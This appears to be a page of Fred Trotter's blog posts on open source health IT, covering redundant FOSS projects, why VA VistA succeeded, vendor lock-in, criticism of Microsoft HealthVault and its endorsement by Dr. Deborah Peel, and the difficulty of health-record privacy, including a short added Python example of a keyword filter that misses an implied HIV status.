FOSS Sin: Pointless Duplication of Effort

Duplication of effort is viewed as a sin in the Free and Open Source software (FOSS) development community. The whole ethos of FOSS dictates that developers should work together, sharing the improvements they make to software between them. For this reason forking, or starting a redundant project, is often viewed as an attack against the community.

The taboo against forking is well-documented. Eric Raymond (or esr) wrote about this in Homesteading the Noosphere, specifically in the section Promiscuous Theory, Puritan Practice. There he discusses three taboos of FOSS culture; note the first one:

The taboos of a culture throw its norms into sharp relief. Therefore, it will be useful later on if we summarize some important ones here:

  • There is strong social pressure against forking projects. It does not happen except under plea of dire necessity, with much public self-justification, and requires a renaming.

I would like to make a specific case that starting a new project, depending on how it is done, can be as violent to the community as an unwelcome fork. I believe that new projects, without new advantages, are just as damaging to the community as forks are. If the community agrees with me on this, I will ask Eric to add “starting redundant projects” to his list of taboos. [section added 4-10-08]

Two separate projects, both doing essentially the same thing in the same way, fracture the community into two factions of programmers who can no longer work together. To fully understand this problem, one has to understand a little about how the Free and Open Source development community works. The first thing to understand is the licensing.

FOSS licensing allows anyone to download software source code and modify it to their heart’s content. While anyone can make modifications to FOSS-licensed code, there is a community standard that one “official” person or group controls the official version. For Linux this person is Linus Torvalds. There are many “versions” of Linux where code is developed and improved, but the community agrees that the version everyone trusts is the version Torvalds releases. Legitimate Linux development always aims to add features to Linux that will ultimately meet with Linus’ approval. But this is only community custom; the license does not require it at all. Eric entitled the chapter above Promiscuous Theory, Puritan Practice precisely because FOSS licenses allow forking while the FOSS community frowns on it. There is nothing, other than cultural rules, stopping me from creating an operating system kernel based 100% on the code currently residing in the repository maintained by Torvalds and calling the project “Fredux”.

If I started “Fredux”, either by forking the Linux codebase or by starting a new kernel project from scratch, and posted it to SourceForge, the Linux community would either mock me or ignore me. The reason is simple: I am not important in the operating system communities, and Linux is very well established. However, it would not be difficult to really piss them off. My hypothetical “Fredux” project could easily anger the Linux community by doing any of the following.

  • Post something to public forums, especially the Linux Kernel mailing list, in an attempt to attract developers from the Linux community over to Fredux.
  • Pretend in public that my project is unique or innovative in a way that distracts from Linux and its legitimate competitors.
  • Get investment capital, or grant funding, at the expense of competing Linux-based projects to develop my Fredux operating system.

What do these actions have in common? They all poach resources that could have legitimately gone to the Linux community. If I started an operating system from scratch the community would react… poorly. The core issue would be that I would be acquiring resources that should have gone to Linux or another legitimate operating system project.

Why? What is wrong with starting a new operating system project? There is no problem with starting a new legitimate operating system and then competing for resources for it. The problem comes when you start an illegitimate new operating system and try to pass it off as a legitimate one. Of course this raises the question: what makes a new project or a fork legitimate?

Here are some guidelines for when a new project might be in order (contact me if you feel I have missed something):

  • The project uses a different programming language, which has some advantage in the field of inquiry.
  • The project addresses a serious feature gap in current projects.
  • The project addresses a serious design limitation in current projects.
  • The project uses a new programming paradigm that has advantages over those currently in use.
  • The project uses a different development process that might have some advantages.
  • The project uses a more common and accepted FOSS license than alternative projects.

So let’s see how this applies to Fredux! Here is a hypothetical Fredux release announcement, version 0.1:

Fredux is a new operating system kernel available under Fred’s Very Open Sourcey License. Fredux is coded entirely in C, which means that it compiles to blazing fast machine code. Fredux is designed to provide a kernel for a POSIX-compliant operating system. Fredux consistently uses a modular approach to software design, allowing it to be extended easily. Fredux will use a distributed development model, ensuring that everyone can see the code and allowing the “many eyeballs” effect to take place. Most importantly, Fredux is completely Open Source and Free Software!

OK, what are the problems with this announcement? First of all, the “usual suspects” of FOSS operating systems (GNU/Linux, FreeBSD, OpenBSD, Hurd, etc.) all use the programming language C, so there is no language benefit to Fredux. Linux and several other projects strive for POSIX compliance, so Fredux has not addressed a feature gap. Because Linux is modular, there is no design advantage. Fredux is developed in the same way Linux is, ergo there is no development style advantage. Lastly, Fredux is NOT open source! You will find that Fred’s Very Open Sourcey License does not appear as an OSI-approved license. You will also not find the license on the list of FSF-approved licenses. So the license is neither “Free” nor “Open Source”. It is a shame how many companies continue to market themselves as Open Source without actually stepping up and meeting the licensing requirements.

On the other hand, let’s look at the description of a legitimate operating system project:

Hurd is a collection of services that run on the Mach micro-kernel. The Hurd implementation is aggressively multi-threaded so that it runs efficiently on both single processors and symmetric multiprocessors. It is possible to develop and test new Hurd kernel components without rebooting the machine (not even accidentally). Running your own kernel components doesn’t interfere with other users, and so no special system privileges are required. Unlike other popular kernel software, the Hurd has an object-oriented structure that allows it to evolve without compromising its design.

This collection of sentences is taken verbatim from the Hurd main page; the sentences were re-arranged to make a point. The paragraph above details supposed advantages of using a micro-kernel design; Linux and other free operating systems usually use a monolithic kernel design. The Hurd people think this is a design improvement on Linux. The description lists features (modify the kernel without rebooting) and architectural advantages. One can debate issues like monolithic kernel vs. micro-kernel for days on end (and people do); what I am trying to clarify here is that, because Linux is so well-established and capable, the Hurd project differentiates itself and explains why it is also a legitimate project right on the project’s home page.

On the project home page for the OpenBSD project we find:

The OpenBSD project produces a FREE, multi-platform 4.4BSD-based UNIX-like operating system. Our efforts emphasize portability, standardization, correctness, proactive security and integrated cryptography. OpenBSD supports binary emulation of most programs from SVR4 (Solaris), FreeBSD, Linux, BSD/OS, SunOS and HP-UX.

Again, this is taken verbatim from the OpenBSD home page. Again, note the emphasis on things that differentiate the project from the dominant Linux project. OpenBSD is famous for its focus on security, and the main page covers this advantage. It is also famous for supporting lots of architectures, again right on the main page. I hope that I am demonstrating, very explicitly, what it means to establish legitimacy in the context of a currently dominant project or projects. OpenBSD even goes so far as to list the projects and products that it competes with.

When multiple projects are legitimate, it is reasonable for each project to compete for developers. Want to work with the most popular OS project? Choose Linux. Want to work with a bunch of people obsessed with security? That would be OpenBSD. Want to work on a micro-kernel? Work with Hurd.

But you should not work on Fredux. It has no advantages over any of these projects. The competition between legitimate projects is… well… legitimate. But the FOSS community will instantly attack anyone who poaches resources for a project that has no discernible advantage over an existing project.

In the medical FOSS community, we are particularly sensitive about this. We have a small community, and dividing it is a real problem. It happens too much already, for “legitimate” reasons. The holy grail in FOSS Health IT is the creation of an Electronic Health Record (EHR). We have several legitimate projects in this space. All of the legitimate projects are starving for resources: developers, documentation writers, clinical experts, funding sources and users.

What are the “legitimate” projects competing to build the best FOSS EHR? Sorry, but this post is already too long. That question merits a whole article on its own.

For now I want to talk about three projects in particular that together illustrate the problem of duplication of effort. Tolven, OpenMRS and ExampleProject [update 4-10-08 to protect the guilty, the name of the offending project has been removed]. Tolven and OpenMRS both have reputations for being mature, Java-based projects. Here is the description of Tolven.

Tolven EHR and PHR products are a suite of Java-based technologies that use the latest in Open Source Java application toolkits to create a heavily Object Oriented, MVC EHR application. In short, the Tolven strategy is to create a very clean Java-based EHR using solid OOP design with the latest tools.

Here is a description of OpenMRS.

OpenMRS is a community-developed, open-source, enterprise electronic medical record system framework intended to aid resource-constrained healthcare environments.

OpenMRS is currently implemented in Kenya, Rwanda, South Africa, Uganda, Tanzania, Zimbabwe, and Peru. Many of the developers are MIT trained and the design of OpenMRS is based on work done at the Regenstrief Institute. 2008 will mark its second year participating in the Google Summer of Code. The design of OpenMRS is carefully thought out to support a rural deployment model. OpenMRS is a very mature project. [added OpenMRS 4-10-08 to acknowledge the tremendous things the project has done]

A bit of downlow information about Tolven: At the time of the writing Tolven is going live in several installations. Tolven has a tremendously talented development team. Tolven has received substantial funding. They have an EHR and PHR already working.

On my short list of legitimate FOSS EHR systems (and believe me, it is short), Tolven and OpenMRS are currently battling for the title of top Java-based project. To review: Tolven is funded, going live now, has 12 full-time developers and working software = legitimate. OpenMRS is funded, deployed all over the place, and backed by some of the top minds in Medical Informatics = legitimate.

ExampleProject is a Java-based EHR system using strict OOP principles and the latest Java software stack.

ExampleProject is in alpha. ExampleProject is primarily developed by one guy, who is working part-time. ExampleProject plans to have a release that can be used in a live environment by October of 2008 (a little less than a year away at the time of writing). ExampleProject is not legitimate.

In short, ExampleProject appears to be a Fredux. What is worse, ExampleProject is constantly put forward as a legitimate project on LinuxMedNews, EMRupdate and the openhealth mailing list. Those forums are intended to be open, and so censoring ExampleProject news would be unethical. The problem is that it appears to the uninitiated as though ExampleProject is important, when in fact it is exactly the opposite: an illegitimate project. ExampleProject has attracted at least two other part-time developers, and seems to be succeeding in acquiring attention and resources that properly should go to Tolven, OpenMRS or some other project. ExampleProject is guilty of the sin of duplication of effort. Everything they are doing has already been done, and well, by another project in the same programming language. Every developer who works with ExampleProject instead of working with Tolven or OpenMRS is accidentally wasting their time. The same is true of beta testers, investors, and others who might be interested in working with a project. Because Tolven and OpenMRS continue to improve, at a greater rate than ExampleProject, it is very unlikely that ExampleProject will ever catch up. While it is fine for the project manager of ExampleProject to waste his own time, it is not OK for him to trick others in the community into wasting time with him.

I have discussed this issue with the ExampleProject project manager. Before I mentioned it to him, he had never heard of Tolven. After spending about ten minutes on the Tolven site he said that the big difference between Tolven’s efforts and his own was that ExampleProject was using Swing, where Tolven was using AJAX. This seems like it might be a real legitimate technical difference, except that Tolven would likely be very happy for someone from the community to step up and create a thick-client using Swing. They would probably say something like “We do not have time to work on both AJAX and Swing interfaces. But our software design should allow any ‘viewer’ type. If you feel Swing interfaces would be better, and were willing to write it yourself, we would be happy to modify our interfaces enough to make that possible.” Even if Tolven were unwilling, the great thing about open source is that you can prove your technical points without the permission of the project manager. If Tolven or OpenMRS were shown that a Swing interface was better than an AJAX interface, they would probably adopt Swing.

A great example of a project that has spawned a sub-project specifically to address differences of opinion regarding user interfaces is the Kubuntu project, which is Ubuntu, only with KDE instead of Gnome.

When a separate project is justified is a complex issue. In fact, I gave Neil Cowles of the Tolven project a stern lecture about why he should be working through the OSCAR project, which was the dominant Java-based EHR project before Tolven came on the scene. Since that lecture Tolven has proven to me and the community generally that they are legitimate. It is possible that ExampleProject, despite its small beginning, will grow into a mature open source EHR. They could prove me wrong.

Right now I would guess that ExampleProject is about one year and a million dollars of development behind Tolven or OpenMRS. If you are a developer, clinician, investor, entrepreneur, or administrator you should probably work with Tolven or OpenMRS if you want a Java-based FOSS EHR. (I will update this article if this ever changes).

I hope I have accomplished two things at this point. I hope I have shown, through a hypothetical example and a real one, examples of when duplication of effort is a problem. I also hope that I have said enough about ExampleProject to steer those who might want to work with a Java-based EHR to Tolven or OpenMRS.

-FT

(Updated April 10, 2008 to clarify content and remove the offending project name. If you care, go read an archived version to find out who ExampleProject was.)

(updated for readability Feb 27, 2008)

Why is VistA good? the VistA open source development model

Recently, VA VistA has been getting a tremendous amount of attention. Let’s take a look at the recent events that highlight what VistA is and why it is important.

The question I would like to ask is “how did this happen?”. Let’s get the story straight. Federal employees developed what appears to be the EHR at the backbone of the highest-quality medical system in the United States. That makes no sense.

I defy my readers to give me legitimate examples of something that any government creates, programs, or manufactures internally that is provably superior to commercial alternatives. The only thing I have thought of is money. Various governments might be considered experts at manufacturing currency.

Despite the inability of governments to “make” things for themselves, the US government seems to have some cool stuff. Aircraft carriers? Corporation-built. Jet planes? Corporation-built. Bridges? Corporation-built. Now for the madness: world-class Electronic Health Record (EHR)? Government-built.

As the Federal Government considers how to further improve VistA it makes terrible decisions because it does not actually understand why VistA is good in the first place. At the heart of this problem is the fact that some of these Federal administrators are no longer in awe of the “miracle of VistA”.

The “miracle of VistA” is that a branch of the US Government, which has no primary expertise in software development, was able to create one of the most highly regarded electronic health records in the world.

VistA is good because it, like typical open source projects, evolved. In fact, the evolution of VistA is an alternative open source development model that is comparable in scope and significance to those found in the most popular open source projects. The best-run FOSS projects evolve, but in slightly different fashions. The Linux kernel is famous for the “benevolent dictator” model, now enabled by git. The Apache project has succeeded with the “wise council” model, which has in turn been successfully applied to other projects besides the core web server. Like Linux, the Apache project has developed tools specifically designed to enable the model that it uses. You can easily find studies about what makes the development of Apache and Linux tick. Here is a short description of the elements of VistA development that made it successful.

VA VistA is developed in a pair programming paradigm: not two coders working side by side, but one coder and one clinician. Each VA hospital was free to develop software that met local needs. Local hospital administrators paired one clinician, intimately familiar with a given clinical need, with one advanced MUMPS programmer, and together they encoded clinical knowledge into VistA. Each local VistA programmer answered to the needs of the local hospital administration. This helped to ensure that the hospital’s needs were never overlooked by a “centralized” software architect. The best software, after initial development and testing at one hospital, was quickly distributed throughout the system to hospitals hungry for similar functionality. The methods for sharing software between hospitals have become more and more formalized, and like Apache and Linux programmers, VistA programmers developed collaboration tools designed specifically to meet the needs of this distributed development environment. The hospital from which a feature originated became the de facto program manager for that feature, coordinating future improvements. Poor code was criticized and systematically abandoned in favor of good code. VistA is not actually one program; rather, it is hundreds of small programs, each of which evolved and improved separately and together. No one person can “understand” what VistA is; instead, VistA experts are usually familiar with a few of the VistA programs and know which other VistA experts are familiar with the other programs. VistA is one of the oldest software projects to rely on a distributed, collaborative development model from its inception.

Obviously, the process is more complex than can be described in a simple blog post. There is enough here to demonstrate several important points.

  • VistA was not “designed” by anyone; it evolved in a collaborative fashion similar to modern open source products.
  • Because the “clinical pair programming” has been happening for more than twenty years, VistA encodes a tremendous amount of clinical expertise that is impossible to “recode” via a traditional design process.
  • VistA was made in a fashion that makes it more like an organism and less like a house or a car.
  • Replacing portions of VistA with proprietary systems is similar to, and works as well as, amputating human limbs and replacing them with prosthetics.
  • Centralizing VistA development is foolish and will never improve the EHR software. The right way to improve VistA is to encourage the evolution of the software in a process similar to the way that one would breed animals.
  • The current VA reorganization, which has local VistA programmers reporting to and paid by a centralized office in Washington, has destroyed the control and influence of local VA hospital administrators over the direction of VistA.
  • Frustrated VistA programmers are flocking to private corporations like Medsphere or to non-profit organizations like WorldVistA in order to ensure that VistA continues to thrive. This brain drain will ultimately damage the VA’s ability to improve VistA.
  • Something needs to be done to ensure that VistA continues to evolve.

Decisions like the recent one to use Cerner’s lab system in the VA are made by administrators who do not understand what VistA is. I hope that this article will help you to understand why those familiar with VistA and Open Source software (like WorldVistA’s Joseph Dal Molin and Doctors Steve Shreeve and Ignacio Valdes) are so put off by the Cerner announcement. Further, this is why the typically technical Hardhats mailing list is boiling with posts which expose the problems within the current VA thinking far more exactly than I have done here.

Now if I could just convince my congressman.

-FT

Buying paint and vendor lock-in

An article I wrote about vendor lock-in in health software has been published in the recent Fall 07 edition of EHR Scope. From the article:

You can fire your paint store, your dentist, your lawyer, your mechanic and even your doctor. You can fire them for any reason. Yet you cannot fire your proprietary EHR software vendor. Or at least, not without also changing the software that you use. So I guess you could fire your proprietary software vendor, but only in the sense that you could “fire” your mechanic, if it meant you were forced to buy a new car.

I will give EHR Scope the exclusive on the article for a few months, and then I will republish it on GPLMedicine.org.

-FT

HealthVault: Medically, Legally, and Politically Savvy but Technically Uninformed.

Dr. Deborah Peel has endorsed Microsoft’s HealthVault PHR. From the Patient Privacy Rights press release:

PatientPrivacyRights.Org founder, Dr. Deborah C. Peel, will stand with Microsoft in Washington, D.C today at a press conference to announce the launch of HealthVault.

Is Dr. Peel qualified to make this recommendation?

Please take a look at Dr. Deborah Peel’s bio; she has done an impressive amount of medicine and privacy activism. At least on this bio, she lists no formal computer science training. On the same page we find the bios of the other Patient Privacy Rights board members. Please note especially the bio of Tina Williamson (use this link, as the one on the bio page is broken), who was formerly the Vice President of Marketing for a dot-com company. This work should count as negative experience when it comes to judging whether marketing claims are borne out by the source code. Perhaps the computer science expertise upon which Dr. Peel relies is on staff? Nope, no computer-science-trained staff there.

According to the Patient Privacy Rights website, there is no competent electronic security or privacy expert with actual computer science training associated with the Patient Privacy Rights organization. But remember, the Privacy Coalition is much more than just the Patient Privacy Rights group! It is made up of 45 different organizations with interests in patient privacy. Perhaps some of these organizations are informing Deborah Peel’s recommendation of the most abusive, monopolistic software company on the planet as the “leading” caretaker of the American consumer’s healthcare record.

Of the 45 organizations, (which are probably great organizations…) only three are technology oriented. One of them is a meta blog site called NewsBull. For the moment I will assume that blogging expertise does not necessarily translate into informed insights into the complexities of protecting patient information, and I will exclude the possibility that informed recommendations came from NewsBull.

The other two organizations with a technical focus are the Electronic Privacy Information Center (EPIC) and Computer Professionals for Social Responsibility (CPSR).

From what I can tell, the most technically impressive person at EPIC is Simon Davies; the rest of the staff appear to be well-meaning policy types. I contacted him to see if he was informing Dr. Peel’s recommendation. His reply:

“I’m still looking into this technology and am hoping to find out more details on the security aspects fairly soon…”

Not exactly a glowing endorsement; instead, it sounds like a typical statement from someone who recognizes the depth of complexity involved. I doubt that Dr. Peel’s technical assessment was informed by Simon Davies.

CPSR, on the other hand, is clearly the home of some very serious tech talent. CPSR was one of the organizations that fought the Clipper chip nonsense. It is currently led by Annalee Newitz and Fyodor Vaskovich, of nmap fame. These people obviously have enough technical muscle to make definitive statements regarding the security of Microsoft. I am still talking to them, but so far it does not seem like they were consulted. Fyodor’s first response to me began:

“Hi Fred. I wouldn’t trust Microsoft with my health records either….”

Somehow, I doubt that Deborah Peel asked the author of nmap what he thought about a PHR from Microsoft before delivering her unqualified recommendations. The fact that she might have had access to that level of expertise and did not insist on consultation is pretty shocking. Of course, it takes some insight to know just how important nmap and Fyodor are in security circles.

Why would someone make a recommendation like that without possessing a tremendous amount of technical savvy, or without consulting someone who had a tremendous amount of technical savvy? Only someone who assumed that this was merely a legal/medical/ethical issue rather than a legal/medical/ethical/technical issue. I have a degree in psychology, and it would be the utmost hubris for me to question a prescription that Dr. Peel gave to one of her patients. It would be totally unethical for me to recommend specific drugs to a mental health patient, despite the fact that I have some informal on-the-job experience with mental health drugs.

The problem with psychoactive drugs, and with medical information privacy, is that the devil is in the details. If I were forced to choose an anti-depression medication for someone, I would probably choose one that I had worked around a lot, something with a big name that made me and my patients feel more comfortable. 8 times out of 10 my prescription might work fine, but I would have no idea why it did not work the other 2 times, no idea how to determine whether it was working or not, and no idea what to do to fix it. I have a four-year degree in mental health… what would it take for me to get that last 20% of prescribing potential? I would need two years of undergraduate courses in hard life sciences, followed by four years of medical school and then four years of residency. In short, to move from 80% accuracy in understanding drug impact to something like 98% accuracy takes about a decade (not to mention the time required for board certification). Hardly seems worth it… until you think about how easy it is to kill someone with drugs. Would you want to see someone who was 80% sure that the drugs you were given would not kill you?

Psychiatrists are qualified to make recommendations for mental health drugs, but their medical training does not qualify them to examine source code and determine whether it matches high-level privacy guidelines. Based on my personal experience, it takes at least 7 years to really have a clue about a specific technology area like this. I have been studying this for 13 years now, and I am often humbled when I discover just how little I know about this stuff. Even with over a decade of training I often feel overwhelmed about what I should do, just concerning the technical issues involved. I would never presume to move outside of my area of expertise to make any clinical decisions.

Dr. Peel should have the same humility when it comes to technical issues. Despite this, Dr. Peel has said “Microsoft is setting an industry standard for privacy.” I am not the only one who thinks that is ridiculous.

But wait, having expertise in medicine does not exclude expertise in Computer Science generally or electronic privacy specifically. It is possible to have both skill sets in one person.

What happens when a board-certified psychiatrist also has a master’s in Computer Science? What happens when the same person spent a decade studying the way information moves in a computer system AND a decade studying medicine? Then they write posts like this one from Dr. Valdes of LinuxMedNews. Granted, I tend to agree with Dr. Valdes on issues like software freedom and ethics in medical computing. Granted, there are experts at Microsoft who would be able to speak intelligently regarding the technical concerns that I am raising. Many of Microsoft’s experts have experience that is equivalent to Dr. Valdes’ training. But those experts are not speaking for 45 different organizations with legitimate interests in patient privacy, endorsing a company with arguably the worst security and privacy track record ever. In short, Dr. Peel is guilty of hubris. While she may have good intentions and clearly has a sincere desire to protect patient privacy, she appears to be very much past her technical depth.

Of course I could be wrong. I have not seen Dr. Peel’s vita. If Dr. Peel will publish her full resume and it contains solid computer-science-based privacy training and experience that she has left off of her online biography, I will be happy to retract some of these criticisms. The only thing that can justify Dr. Peel’s endorsement is a full source-code review by a professional electronic privacy expert. If Dr. Peel can show that she had access to such a review, then I would be happy to retract some of these criticisms. Finding this article unchanged and unamended implies that my assumptions about Dr. Peel are, in fact, correct.

If HealthVault were to be successful it would be good for Microsoft’s bottom line, but terrible for our culture. Indeed, Dr. Peel is right about one thing: Microsoft would be “leading” us. Those wearing shackles are often led by others.

-Fred Trotter

HealthVault: What to do if Microsoft does nothing

Somehow I doubt that Microsoft will respond to my criticisms. This is what the Free and Open Source community needs to attempt if Microsoft refuses to budge.

We need to write a tool, using the Microsoft HealthVault API to export the data from HealthVault. Preferably this should export to a standard format, but comma delimited is better than nothing.

If you are an investor who wants to make a business around this tool, please contact me and I will put you in touch with a technical team (not me... I have no interest in this just now). If you are a programmer and you would like to work on this, contact me to be part of the technical team.

When confronted with proprietary software and no alternatives, hack around the problem.

HealthVault: How to fix it

Microsoft often does the wrong thing. But that does not mean they have to. There are three requirements for behaving ethically as a PHR host.

  1. You must release all of the sourcecode to your PHR under a license that qualifies as both “Free (as-in-Freedom-not-price) Software” and Open Source.
  2. You must allow for the export of all data in a standard format like CCR.
  3. If you are going to allow “partners” to use proprietary code, (which you should not) you must inform your consumers that the medical data given to those partners could become locked.

Pretty simple. By releasing sourcecode, Microsoft would ensure that the software could be run without Microsoft’s help. That means that Microsoft might go away in two hundred years or so, but the HealthVault software would not. By allowing your consumers to download their data in a standard format you would ensure that the data would not be trapped in a proprietary format.

Recently Microsoft has released two licenses that were approved as open source licenses. These would be ideal for use in this environment.

Will this happen? I think it has a snowball’s chance, but perhaps, if Microsoft does not listen, Google might.

HealthVault: The Food critic never took a bite.

I hope I have made my case that “patient privacy” is complex enough that merely “Recognize that patients have the right to medical privacy” is the ethical equivalent of saying “When considering the medical ethical issue of abortion, you must recognize that often women want to get pregnant and have a child.” This is a great example of a statement that sounds good, is completely true, and yet gets us nowhere.

Generally all of the “Patient Privacy Principles” have this problem. They are great principles, but when you get deeper, to the level that is required when implementing software, it is obvious that they are only useful in spirit. For instance:

“Deny employers access to employees’ medical records before informed consent has been obtained”

Sounds good, right? But does that mean that you will require consent to inform the employer of a worker’s compensation injury status? Doesn’t the employer have the right to know the ongoing status of a workplace injury without repeated informed consent? What, exactly, does informed consent mean? When was the last time you started a new job and did not sign all of the fifteen CYA forms that your employer put in front of you? Does that count as informed consent? Again, obviously the spirit of the law here is good, which is something like “employers should not be able to discriminate against employees based on health information,” but that does not cut it when making software; we have to determine exactly what the system will do and what it will not do in order to write it.

So are the Privacy Principles flawed? Only when their interpretation is left to a private company with no possible way for patients to review how the code actually works!

Deborah Peel’s endorsement of Microsoft’s HealthVault is the equivalent of a food critic looking at a magazine food ad to make a recommendation for a restaurant. Have you ever looked at those ads when you were really hungry? You see the roasted turkey browned to perfection with a pat of butter slowly melting on it. Looks delicious! It is impossible to make that photograph with food that also tastes good. Food photographers work all day on food photographs; they cannot afford to have food that changes in appearance over the course of an hour. Can you imagine trying to include a fresh bowl of guacamole in a picture with ten other foods? Long before the picture was ready the guacamole would look disgusting. That beautiful turkey browned to perfection is actually a frozen turkey that has had the skin “browned” using a paint remover gun. The pat of butter… well, let’s just say it’s not butter. I know this might seem obvious, but in order to judge the quality of food, a food critic must actually taste the dish.

There is no way that Dr. Peel can verify one way or another that HealthVault works the way Microsoft says it does. For instance, it would be trivial for every new piece of data for every patient to be automatically emailed to Bill Gates, or Fred Trotter. That “email the record” functionality would change nothing in the appearance of the user interface that Dr. Peel evaluated (I assume she looked at the interface). The only way to sort this out is to examine the sourcecode. Any competent Computer Scientist would acknowledge that this is trivially true: obviously it is not what Microsoft says that matters, nor is it what the software appears to do! What matters is what the software actually does and the only way to determine this, one way or another is to read the sourcecode. There is a long and glorious tradition in the software industry of shall we say “fudging” what the software actually does for marketing purposes. Is Dr. Peel qualified to examine this source code vs. marketing material gap? More on this issue later.

-FT

Privacy, a Complex Problem Underestimated.

I have passed my CISSP certification, marking me as an Information Security Expert. I had to pass a complex test and demonstrate that I had three years of full-time security experience to become CISSP certified. I have a four year degree in Computer Science, and I have been trained in Information Warfare by the United States Air Force at the Air Force Information Warfare Center in San Antonio. I have been trained in physical security by the United States Marine Corps (Hoorah). I have worked in Healthcare IT Security for over 5 years now. Frankly, I find the issue of Health Information Security to be extremely complex. Here are examples of the thorny issues that I face as a professional. (this article was originally written about HealthVault, but applies so broadly I removed HealthVault from the title 10-04-11)

There are various State and National laws that govern the disclosure of HIV or AIDS status. These often mean that portions of medical records must operate under different disclosure rules based on whether they reveal a person’s HIV status. For instance, imagine the physician discussing a patient with AIDS in the notes section for that patient.

“It would be good if Patient X could maintain their exercise regime. However, given his level of immune function, Patient X should stay away from public gymnasiums, which can be unsanitary. I recommend any kind of constant aerobic activity, three times a week for at least 30 minutes each.”

Normally a message like this would be ideal for a PHR to pass to a personal trainer, however the middle sentence arguably reveals the HIV status of the patient. There was no mention of the terms “HIV” or “AIDS” so a simple text search of the document could not easily determine that it was associated with HIV status. Yet this piece of patient information should be treated differently. The level of awareness that a PHR would need to have in order to determine that the note above is related to HIV status is equivalent to human intelligence. The PHR would need to understand English to such a high degree that it would be very close to passing the Turing Test.

The alternative, of course, is to have a person validate every piece of data to see if they reveal HIV status for patients whose PHR records are tagged with HIV positive status. But how many records could such a custodian hope to manage? What level of human-error would be acceptable from such a custodian? Assuming all the records were correctly tagged, how could a human accurately review thousands of medical data points in a given record?

But even those issues ignore the problem of who tags a record with HIV status. Perhaps the patient should be in charge of tagging the account with HIV status, so that automated systems could attempt to handle the rest. But what if a patient wants to withhold that status from the PHR?
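The segmentation problem described above, as an added example that is not from the original post: a naive keyword filter of the kind a PHR might use to withhold HIV-related sentences from a personal trainer. The category term lists and the second, explicit note are constructed for this example; the first note is the physician's note quoted above. Run on both, the filter catches the explicit note and releases the implicit one untouched.

```python
import re

# Keyword lists a naive segmentation filter might use to flag sensitive categories.
# Constructed for this example; real lists would be far longer and still incomplete.
SENSITIVE_TERMS = {
    "hiv": {"hiv", "aids", "antiretroviral", "cd4", "viral load"},
    "mental_health": {"psychiatrist", "depression", "antidepressant"},
    "reproductive": {"pregnant", "pregnancy", "contraception"},
}


def split_sentences(text: str) -> list[str]:
    """Split on sentence-ending punctuation followed by whitespace."""
    return [s.strip() for s in re.split(r"(?<=[.!?])\s+", text.strip()) if s.strip()]


def tag_sentence(sentence: str) -> set[str]:
    """Return the sensitive categories whose terms appear in the sentence."""
    lowered = sentence.lower()
    words = set(re.findall(r"[a-z0-9]+", lowered))
    tags = set()
    for category, terms in SENSITIVE_TERMS.items():
        for term in terms:
            # Multi-word terms are matched as substrings, single words as whole tokens.
            if (" " in term and term in lowered) or term in words:
                tags.add(category)
    return tags


def segment_note(note: str) -> list[tuple[str, set[str]]]:
    """Pair every sentence of a note with the categories it was tagged with."""
    return [(s, tag_sentence(s)) for s in split_sentences(note)]


def release_to(note: str, allowed: set[str]) -> str:
    """Release only sentences whose tags are all within the recipient's allowed set.

    A personal trainer would be given allowed=set(): nothing tagged sensitive.
    """
    return " ".join(s for s, tags in segment_note(note) if tags <= allowed)


# The physician's note quoted in the post: HIV status is implied, never named.
IMPLICIT_NOTE = (
    "It would be good if Patient X could maintain their exercise regime. "
    "However, given his level of immune function, Patient X should stay away "
    "from public gymnasiums, which can be unsanitary. "
    "I recommend any kind of constant aerobic activity, three times a week "
    "for at least 30 minutes each."
)

# A constructed note that states the diagnosis outright.
EXPLICIT_NOTE = (
    "Patient X is HIV positive and tolerating antiretroviral therapy well. "
    "I recommend any kind of constant aerobic activity, three times a week."
)

if __name__ == "__main__":
    for label, note in (("implicit", IMPLICIT_NOTE), ("explicit", EXPLICIT_NOTE)):
        print(f"{label}: released to trainer -> {release_to(note, set())!r}")
```

Adding “immune function” to the list would catch this particular note, but would also flag every note about vaccination or allergy, which is the over-segmentation side of the same problem.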

What about family planning and pregnancy status? Physicians must be very careful to follow local laws to know to what extent a patient’s parents can be informed about their under-aged daughter’s reproductive condition. However, any other medical condition would obviously be under the purview of the child’s parents or guardians.

There are also cases where the patients themselves cannot access their own records. Many psychiatrist records must be protected in this manner.

Can a patient remove the information that they have diabetes from their own record? Can they remove their allergy to penicillin? What if they removed it by accident? If patients can accidentally remove data, or can remove a diagnosis or allergy that they do not like, how can a physician or other healthcare provider rely on the contents of the PHR? If a physician knows that they cannot rely on the contents of the PHR, why would they bother to add information themselves? If physicians do not add information to the PHR, why should its contents be trusted? Electronic trust is tricky.

If the patient cannot totally control every aspect of the record, does the patient really own the record? Does the healthcare provider own the record, even though the law often compels providers to produce and distribute a patient’s record?

How much information should payers (insurance companies, etc.) be able to see? Payers certainly must be made aware of the procedures that they will be paying for, but they should not be given so much information that they can discriminate inappropriately.

Let’s sum up. Medical records belong to the patient, except when they don’t. They should be accessible to the patient except when they shouldn’t. The records of minors are always open to their guardians except when they are closed. Segmenting data in order to protect portions of health information is currently an intractable problem of free-text analysis. Tagging patient records with critical information is difficult. Trust is far more complex than it first seems. Finally, patients should be allowed to “control” their own record, except when that control would allow them to do something that would invalidate the record.

This is just a taste of the kinds of problems that I have run across during a career as a health information privacy professional. Notice that a deep understanding of several of these problems requires enough Computer Science know-how to understand why free text analysis is a difficult problem. The other problems required at least shallow understandings of medico-legal issues, which seems simple until you consider how you are going to design a PHR or EHR to meet these requirements.

How do you design a PHR so that “control” can be so finely parsed? How do you put the doctor in charge sometimes, the patient in charge other times (except to undo what the doctor did), the teenage daughter in charge, for only one of her medical issues, in such a way that her parents are not informed about that one medical issue, but are in charge of everything else?

In short, “patient privacy” is a very, very complex problem that requires some pretty high level thinking and is pretty easy to mess up. When you see someone pretending that there is a simple solution to these problems, you should be very suspicious.

HealthVault: No Commitments and a Sleeping Watchdog.

Has Microsoft committed to keeping the promises that it has already made? No, just the opposite. Their privacy policy concludes: “We may occasionally update this privacy statement.”

Which means that when the commitments that Microsoft has made regarding HealthVault become inconvenient, they will simply change them.

Will the data that you enter into HealthVault be secure? Would my HealthVault data be studied by my insurance company? Would access be limited to those who I choose to have access? Thank goodness Microsoft’s answer to this question was not simply “Trust Me”! Instead it is “Trust my auditor”. This is, apparently, enough to satisfy the Patient Privacy Rights Foundation and the Coalition for Patient Privacy. From a recent Patient Privacy Rights press release Dr. Deborah Peel is quoted:

